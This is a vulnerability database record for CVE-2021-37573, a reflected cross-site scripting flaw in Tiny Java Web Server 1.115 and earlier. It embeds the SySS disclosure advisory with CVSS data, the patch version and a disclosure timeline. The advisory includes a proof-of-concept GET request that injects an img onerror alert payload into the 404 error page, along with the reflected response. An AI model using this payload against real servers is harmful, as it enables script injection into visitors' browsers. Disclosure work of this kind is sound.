DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2021-37573", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-37573", "description": "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page", "published": "2021-08-09T13:15:00", "modified": "2021-08-17T12:51:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-37573", "reporter": "cve@mitre.org", "references": ["https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt", "http://seclists.org/fulldisclosure/2021/Aug/13", "http://packetstormsecurity.com/files/163825/Tiny-Java-Web-Server-1.115-Cross-Site-Scripting.html"], "cvelist": ["CVE-2021-37573"], "immutableFields": [], "lastseen": "2022-03-23T18:56:02", "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:163825"]}], "rev": 4}, "score": {"value": 3.3, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-08-17T07:54:25", "tweets": [{"link": "https://twitter.com/KeoXes/status/1426477235578544129", "text": "[SYSS-2021-042] TJWS - Reflected Cross-Site Scripting (CVE-2021-37573): https://t.co/Dh2kmhCxwO?amp=1 /hashtag/follow?src=hashtag_click & /hashtag/RT?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/infosec?src=hashtag_click"}, {"link": "https://twitter.com/KeoXes/status/1426477235578544129", "text": "[SYSS-2021-042] TJWS - Reflected Cross-Site Scripting (CVE-2021-37573): https://t.co/Dh2kmhCxwO?amp=1 /hashtag/follow?src=hashtag_click & /hashtag/RT?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/infosec?src=hashtag_click"}, {"link": "https://twitter.com/SecurityNewsbot/status/1426634769962397699", "text": "[SYSS-2021-042] TJWS - Reflected Cross-Site Scripting (CVE-2021-37573) https://t.co/jOirNbAueC?amp=1 /hashtag/FullDisclosure?src=hashtag_click"}, {"link": "https://twitter.com/threatintelctr/status/1427616448466329603", "text": " NEW: CVE-2021-37573 A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's... (click for more) Severity: MEDIUM https://t.co/vlEAVor0EM?amp=1"}]}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:163825"]}]}, "exploitation": null, "vulnersScore": 3.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:tiny_java_web_server_project:tiny_java_web_server:1.115"], "cpe23": ["cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:1.115:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "tiny_java_web_server_project:tiny_java_web_server", "version": "1.115", "operator": "le", "name": "tiny java web server project tiny java web server"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:1.115:*:*:*:*:*:*:*", "versionEndIncluding": "1.115", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt", "name": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2021/Aug/13", "name": "20210813 [SYSS-2021-042] TJWS - Reflected Cross-Site Scripting (CVE-2021-37573)", "refsource": "FULLDISC", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/163825/Tiny-Java-Web-Server-1.115-Cross-Site-Scripting.html", "name": "http://packetstormsecurity.com/files/163825/Tiny-Java-Web-Server-1.115-Cross-Site-Scripting.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}

{"packetstorm": [{"lastseen": "2021-08-16T17:18:20", "description": "", "cvss3": {}, "published": "2021-08-14T00:00:00", "type": "packetstorm", "title": "Tiny Java Web Server 1.115 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-37573"], "modified": "2021-08-14T00:00:00", "id": "PACKETSTORM:163825", "href": "https://packetstormsecurity.com/files/163825/Tiny-Java-Web-Server-1.115-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: SYSS-2021-042 \nProduct: Tiny Java Web Server and Servlet Container \n(TJWS) \nManufacturer: D. Rogatkin \nAffected Versions: <= 1.115 \nTested Versions: 1.107, 1.114 \nVulnerability Type: Cross-Site Scripting (CWE-79) \nRisk Level: Medium \nSolution Status: Fixed \nManufacturer Notification: 2021-07-21 \nSolution Date: 2021-07-23 \nPublic Disclosure: 2021-08-03 \nCVE Reference: CVE-2021-37573 \nAuthor of Advisory: Maurizio Ruchay, SySS GmbH \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nOverview: \n \nTiny Java Web Server and Servlet Container (TJWS) is a lightweight web \nserver written in Java. \n \nThe manufacturer describes the product as follows (see [1]): \n\"The Miniature Java Web Server is built as a servlet container with HTTPD \nservlet providing standard Web server functionality.\" \n \nDue to improper input validation, the application is vulnerable to a \nreflected cross-site scripting attack. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nVulnerability Details: \n \nIt is possible to inject malicious JavaScript code into the server's error \npage \"404 Page Not Found\". \n \nThe given input is not properly validated and therefore reflected back \nand executed in a victim's browser. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nProof of Concept (PoC): \n \nThe following GET request shows how JavaScript code can be placed on \nthe page: \n \n=== \nHTTP request: \nGET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1 \n[...] \nConnection: close \n \n \nHTTP response: \nHTTP/1.1 404 te<img src=x onerror=alert(42)>st not found \nserver: D. Rogatkin's TJWS (+Android, JSR340, JSR356) \nhttps://github.com/drogatkin/TJWS2.git/Version 1.114 \n[...] \ncontent-length: 338 \nconnection: close \n \n<HTML><HEAD><TITLE>404 te<img src=x onerror=alert(42)>st not \nfound</TITLE></HEAD><BODY BGCOLOR=\"#D1E9FE\"> \n[...] \n<H2>404 te<img src=x onerror=alert(42)>st not found</H2> \n[...] \n=== \n \nIf a browser renders the response, the JavaScript code is executed \nshowing the message \"42\". \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSolution: \n \nThe issue has been addressed in the release version 1.116.[2] \nTherefore, all instances of TJWS should be updated to this version. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nDisclosure Timeline: \n \n2021-07-02: Vulnerability discovered \n2021-07-21: Vulnerability reported to manufacturer \n2021-07-23: Patch released by manufacturer \n2021-08-03: Public disclosure of vulnerability \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nReferences: \n \n[1] Product website for Tiny Java Web Server and Servlet Container (TJWS): \nhttp://tjws.sourceforge.net/ \n[2] Patch release on Github: \nhttps://github.com/drogatkin/TJWS2/releases/tag/v1.116 \n[3] SySS Responsible Disclosure Policy \nhttps://www.syss.de/en/responsible-disclosure-policy \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nCredits: \n \nThis security vulnerability was found by Maurizio Ruchay of SySS GmbH. \n \nE-Mail: maurizio.ruchay@syss.de \nPublic Key: \nhttps://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc \nKey ID: 0xC7D20E267F0FA978 \nKey Fingerprint: D506 AB5A FE3E 09AE FFBE DEB2 C7D2 0E26 7F0F A978 \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nDisclaimer: \n \nThe information provided in this security advisory is provided \"as is\" \nand without warranty of any kind. Details of this security advisory may \nbe updated in order to provide as accurate information as possible. The \nlatest version of this security advisory is available on the SySS Web \nsite. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nCopyright: \n \nCreative Commons - Attribution (by) - Version 3.0 \nURL: https://creativecommons.org/licenses/by/3.0/deed.en \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163825/SYSS-2021-042.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}